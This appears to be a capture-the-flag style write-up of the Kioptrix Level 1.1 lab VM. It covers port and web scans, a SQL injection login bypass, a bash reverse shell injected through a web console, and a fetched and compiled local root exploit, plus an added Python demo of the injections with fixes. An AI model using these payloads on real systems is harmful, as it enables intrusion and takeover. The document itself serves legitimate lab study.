【WriteUp】Kioptrix Level1.1
Introduction
Another rematch with a box from a while back.
Playing the Kioptrix sequel on my own.
Tools used
nmap
nikto
dirb
Reconnaissance
% nmap -sS -sV -A -T5 -p 1-20000 192.168.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 11:15 EDT
Nmap scan report for 192.168.3.30
Host is up (0.0012s latency).
Not shown: 9993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EF:7A:CC (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds
Result: the running services are as follows
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
% dirb http://192.168.3.30
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 28 11:15:48 2020
URL_BASE: http://192.168.3.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.3.30/ ----
+ http://192.168.3.30/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.30/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.3.30/manual/
+ http://192.168.3.30/usage (CODE:403|SIZE:285)
---- Entering directory: http://192.168.3.30/manual/ ----
==> DIRECTORY: http://192.168.3.30/manual/de/
==> DIRECTORY: http://192.168.3.30/manual/developer/
==> DIRECTORY: http://192.168.3.30/manual/en/
==> DIRECTORY: http://192.168.3.30/manual/faq/
==> DIRECTORY: http://192.168.3.30/manual/fr/
==> DIRECTORY: http://192.168.3.30/manual/howto/
==> DIRECTORY: http://192.168.3.30/manual/images/
+ http://192.168.3.30/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.3.30/manual/ja/
==> DIRECTORY: http://192.168.3.30/manual/ko/
+ http://192.168.3.30/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/misc/
==> DIRECTORY: http://192.168.3.30/manual/mod/
==> DIRECTORY: http://192.168.3.30/manual/programs/
==> DIRECTORY: http://192.168.3.30/manual/ru/
==> DIRECTORY: http://192.168.3.30/manual/ssl/
==> DIRECTORY: http://192.168.3.30/manual/style/
---- Entering directory: http://192.168.3.30/manual/de/ ----
+ http://192.168.3.30/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/developer/
+ http://192.168.3.30/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/faq/
+ http://192.168.3.30/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/howto/
==> DIRECTORY: http://192.168.3.30/manual/de/images/
+ http://192.168.3.30/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.3.30/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/de/misc/
==> DIRECTORY: http://192.168.3.30/manual/de/mod/
==> DIRECTORY: http://192.168.3.30/manual/de/programs/
+ http://192.168.3.30/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/ssl/
==> DIRECTORY: http://192.168.3.30/manual/de/style/
---- Entering directory: http://192.168.3.30/manual/developer/ ----
+ http://192.168.3.30/manual/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/en/ ----
+ http://192.168.3.30/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/developer/
+ http://192.168.3.30/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/faq/
+ http://192.168.3.30/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/howto/
==> DIRECTORY: http://192.168.3.30/manual/en/images/
+ http://192.168.3.30/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/en/misc/
==> DIRECTORY: http://192.168.3.30/manual/en/mod/
==> DIRECTORY: http://192.168.3.30/manual/en/programs/
+ http://192.168.3.30/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/ssl/
==> DIRECTORY: http://192.168.3.30/manual/en/style/
---- Entering directory: http://192.168.3.30/manual/faq/ ----
+ http://192.168.3.30/manual/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/fr/ ----
+ http://192.168.3.30/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/developer/
+ http://192.168.3.30/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/faq/
+ http://192.168.3.30/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/howto/
==> DIRECTORY: http://192.168.3.30/manual/fr/images/
+ http://192.168.3.30/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/fr/misc/
==> DIRECTORY: http://192.168.3.30/manual/fr/mod/
==> DIRECTORY: http://192.168.3.30/manual/fr/programs/
+ http://192.168.3.30/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/ssl/
==> DIRECTORY: http://192.168.3.30/manual/fr/style/
---- Entering directory: http://192.168.3.30/manual/howto/ ----
+ http://192.168.3.30/manual/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ja/ ----
+ http://192.168.3.30/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/developer/
+ http://192.168.3.30/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/faq/
+ http://192.168.3.30/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/howto/
==> DIRECTORY: http://192.168.3.30/manual/ja/images/
+ http://192.168.3.30/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.3.30/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ja/misc/
==> DIRECTORY: http://192.168.3.30/manual/ja/mod/
==> DIRECTORY: http://192.168.3.30/manual/ja/programs/
+ http://192.168.3.30/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ja/style/
---- Entering directory: http://192.168.3.30/manual/ko/ ----
+ http://192.168.3.30/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/developer/
+ http://192.168.3.30/manual/ko/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/faq/
+ http://192.168.3.30/manual/ko/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/howto/
==> DIRECTORY: http://192.168.3.30/manual/ko/images/
+ http://192.168.3.30/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.3.30/manual/ko/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ko/misc/
==> DIRECTORY: http://192.168.3.30/manual/ko/mod/
==> DIRECTORY: http://192.168.3.30/manual/ko/programs/
+ http://192.168.3.30/manual/ko/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ko/style/
---- Entering directory: http://192.168.3.30/manual/misc/ ----
+ http://192.168.3.30/manual/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/mod/ ----
+ http://192.168.3.30/manual/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/programs/ ----
+ http://192.168.3.30/manual/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/ru/ ----
+ http://192.168.3.30/manual/ru/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/developer/
+ http://192.168.3.30/manual/ru/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/faq/
+ http://192.168.3.30/manual/ru/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/howto/
==> DIRECTORY: http://192.168.3.30/manual/ru/images/
+ http://192.168.3.30/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.3.30/manual/ru/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ru/misc/
==> DIRECTORY: http://192.168.3.30/manual/ru/mod/
==> DIRECTORY: http://192.168.3.30/manual/ru/programs/
+ http://192.168.3.30/manual/ru/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ru/style/
---- Entering directory: http://192.168.3.30/manual/ssl/ ----
+ http://192.168.3.30/manual/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/de/developer/ ----
+ http://192.168.3.30/manual/de/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/de/faq/ ----
+ http://192.168.3.30/manual/de/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/de/howto/ ----
+ http://192.168.3.30/manual/de/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/de/misc/ ----
+ http://192.168.3.30/manual/de/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/de/mod/ ----
+ http://192.168.3.30/manual/de/mod/index.html (CODE:200|SIZE:13561)
---- Entering directory: http://192.168.3.30/manual/de/programs/ ----
+ http://192.168.3.30/manual/de/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/de/ssl/ ----
+ http://192.168.3.30/manual/de/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/en/developer/ ----
+ http://192.168.3.30/manual/en/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/en/faq/ ----
+ http://192.168.3.30/manual/en/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/en/howto/ ----
+ http://192.168.3.30/manual/en/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/en/misc/ ----
+ http://192.168.3.30/manual/en/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/en/mod/ ----
+ http://192.168.3.30/manual/en/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/en/programs/ ----
+ http://192.168.3.30/manual/en/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/en/ssl/ ----
+ http://192.168.3.30/manual/en/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/fr/developer/ ----
+ http://192.168.3.30/manual/fr/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/fr/faq/ ----
+ http://192.168.3.30/manual/fr/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/fr/howto/ ----
+ http://192.168.3.30/manual/fr/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/fr/misc/ ----
+ http://192.168.3.30/manual/fr/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/fr/mod/ ----
+ http://192.168.3.30/manual/fr/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/fr/programs/ ----
+ http://192.168.3.30/manual/fr/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/fr/ssl/ ----
+ http://192.168.3.30/manual/fr/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ja/developer/ ----
+ http://192.168.3.30/manual/ja/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/ja/faq/ ----
+ http://192.168.3.30/manual/ja/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/ja/howto/ ----
+ http://192.168.3.30/manual/ja/howto/index.html (CODE:200|SIZE:5607)
---- Entering directory: http://192.168.3.30/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ja/misc/ ----
+ http://192.168.3.30/manual/ja/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/ja/mod/ ----
+ http://192.168.3.30/manual/ja/mod/index.html (CODE:200|SIZE:13298)
---- Entering directory: http://192.168.3.30/manual/ja/programs/ ----
+ http://192.168.3.30/manual/ja/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/ja/ssl/ ----
+ http://192.168.3.30/manual/ja/ssl/index.html (CODE:200|SIZE:3957)
---- Entering directory: http://192.168.3.30/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ko/developer/ ----
+ http://192.168.3.30/manual/ko/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/ko/faq/ ----
+ http://192.168.3.30/manual/ko/faq/index.html (CODE:200|SIZE:3371)
---- Entering directory: http://192.168.3.30/manual/ko/howto/ ----
+ http://192.168.3.30/manual/ko/howto/index.html (CODE:200|SIZE:5299)
---- Entering directory: http://192.168.3.30/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ko/misc/ ----
+ http://192.168.3.30/manual/ko/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/ko/mod/ ----
+ http://192.168.3.30/manual/ko/mod/index.html (CODE:200|SIZE:12795)
---- Entering directory: http://192.168.3.30/manual/ko/programs/ ----
+ http://192.168.3.30/manual/ko/programs/index.html (CODE:200|SIZE:4543)
---- Entering directory: http://192.168.3.30/manual/ko/ssl/ ----
+ http://192.168.3.30/manual/ko/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ru/developer/ ----
+ http://192.168.3.30/manual/ru/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/ru/faq/ ----
+ http://192.168.3.30/manual/ru/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/ru/howto/ ----
+ http://192.168.3.30/manual/ru/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ru/misc/ ----
+ http://192.168.3.30/manual/ru/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/ru/mod/ ----
+ http://192.168.3.30/manual/ru/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/ru/programs/ ----
+ http://192.168.3.30/manual/ru/programs/index.html (CODE:200|SIZE:5016)
---- Entering directory: http://192.168.3.30/manual/ru/ssl/ ----
+ http://192.168.3.30/manual/ru/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Mar 28 11:33:05 2020
DOWNLOADED: 262884 - FOUND: 102
Result: nothing particularly notable.
% nikto 192.168.3.30
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.30
+ Target Hostname: 192.168.3.30
+ Target Port: 80
+ Start Time: 2020-03-28 20:56:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2020-03-28 20:58:08 (GMT-4) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Result: nothing particularly notable here either.
Opening it in a regular browser brings up what looks like a login screen.
Gaining access
Attempting to get in over SSH
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh 192.168.3.30
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
kali@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh admin@192.168.3.30
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
admin@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh root@192.168.3.30
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
root@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$
Since password authentication is enabled, brute-forcing would probably work too, but I'll leave that for later.
Attempting to get in via the browser
Logging in with several usernames went nowhere, so I try SQL injection.
ID: ' OR 1 = 1 --
PW: ' OR 1 = 1 --
Result: the authentication page was bypassed successfully.
The next screen displayed is a Web Console.
Using the reverse shell cheat sheet from pentestmonkey as a reference,
I try a bash reverse shell.
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
The bash one is this:
bash -i >& /dev/tcp/192.168.3.27/8080 0>&1
On the Kali side, wait for the connection with nc.
% nc -l 192.168.3.27 -p 8080
Then add ; in front of the reverse shell bash command above and run it.
The browser hangs on loading, and a bash shell comes up on the Kali side.
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nc -l -p 8080
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$
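Added example, not from the original writeup: the two web bugs chained above, the login query that the ' OR 1 = 1 -- payload bypasses and a console ping command built by string concatenation that a ';' extends, each shown in Python beside its fix. The users table, the exact ping command and the Web Console's internals are assumptions, since the page shows neither the PHP source nor the database schema.

```python
import ipaddress
import sqlite3

# Payload exactly as used on the page for both the ID and PW fields.
SQLI_PAYLOAD = "' OR 1 = 1 --"


def make_db():
    # Constructed stand-in for the box's login table; the real schema on
    # Kioptrix 1.1 is not shown in the writeup (assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, user, pw):
    # The query is assembled by string concatenation, so the quote in the
    # payload closes the literal, OR 1 = 1 makes the WHERE clause true for
    # every row, and -- comments out the password check entirely.
    query = ("SELECT username FROM users WHERE username = '" + user
             + "' AND password = '" + pw + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, user, pw):
    # Parameterised query: the payload is bound as data and compared as a
    # literal username, so it never reaches the SQL parser.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (user, pw)).fetchone()
    return row[0] if row else None


def ping_command_vulnerable(host):
    # Models a console that pastes the user string into one shell command
    # line (assumption about the page's Web Console); a ';' in the value
    # then terminates ping and starts a second command.
    return "ping -c 3 " + host  # the string a shell_exec()-style call would run


def ping_command_safe(host):
    # Validate that the value is a literal IP address and return argv as a
    # list for subprocess.run(argv) so no shell ever parses it.
    try:
        ip = ipaddress.ip_address(host.strip())
    except ValueError:
        return None  # caller should reject the request
    return ["ping", "-c", "3", str(ip)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("safe login:", login_safe(db, SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("vulnerable ping:", ping_command_vulnerable("127.0.0.1; id"))
    print("safe ping:", ping_command_safe("127.0.0.1; id"))
```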
Privilege escalation
Exploring with privilege escalation in mind, the following file contains the OS information.
% cat /etc/redhat-release
bash-3.00$ cat redhat-release
CentOS release 4.5 (Final)
Searching searchsploit for whether privilege escalation is possible on the listed version turned up code.
The upper of these exploit codes.
Since the code has to run locally on the target,
I spin up a simple server on Kali and transfer it.
% python -m SimpleHTTPServer 8080
On the server, move to /tmp and
% wget "http://192.168.3.27:8080/9542.c"
Compile the delivered code and run it.
gcc -o exploit 9542.c
./exploit
I was able to go all the way to obtaining root privileges.
Next steps
・Creating a backdoor
・Reading other people's writeups and studying them
・Solving it without the tools already used
and so on; I'd like to do all of these.
That's all.